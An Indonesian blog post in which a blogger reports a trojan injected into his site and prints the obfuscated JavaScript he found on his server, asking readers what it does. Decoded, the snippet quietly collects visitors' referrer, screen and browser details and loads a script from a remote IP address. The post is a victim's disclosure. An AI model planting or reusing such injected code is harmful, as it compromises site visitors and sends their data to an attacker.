Injeksi Kode Trojan di Blog
Ada laporan dari seorang rekan narablog (Cahya), bahwa antivirus Avast-nya telah mendeteksi adanya trojan yang ada di salah satu halaman rismaka .NET.
Hmm.. saya sudah beberapa kali mendapat serangan injeksi virus ataupun trojan ini sebelumnya, saat saya sedang malas untuk mengurus server yang saya gunakan. Namun ternyata hari ini masih ada orang yang iseng nyerang rismaka .NET lagi. Trims sekali untuk mas Cahya atas laporannya melalui mention twitter-nya.
Ternyata benar, setelah saya cek satu-persatu script yang ada di server, ada satu baris kode yang aneh. Sepertinya baris kode itu telah diinjeksi oleh si penyerang untuk menginfeksi blog rismaka .NET dengan trojan. Inilah baris kode tersebut:
var _0xdc8d=["x73x63x5Fx63x6F","x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64","x63x6Fx6Cx6Fx72x44x65x70x74x68","x77x69x64x74x68","x68x65x69x67x68x74","x63x68x61x72x73x65x74","x6Cx6Fx63x61x74x69x6Fx6E","x72x65x66x65x72x72x65x72","x75x73x65x72x41x67x65x6Ex74","x73x63x72x69x70x74","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x69x64","x73x72x63","x68x74x74x70x3Ax2Fx2Fx39x31x2Ex31x39x36x2Ex32x31x36x2Ex36x34x2Fx73x2Ex70x68x70x3Fx72x65x66x3D","x26x63x6Cx73x3D","x26x73x77x3D","x26x73x68x3D","x26x64x63x3D","x26x6Cx63x3D","x26x75x61x3D","x68x65x61x64","x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65","x61x70x70x65x6Ex64x43x68x69x6Cx64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;
Bila ada yang tahu fungsi kode di atas, mohon informasikan ke saya.
Itu namanya risiko popularitas Mas
.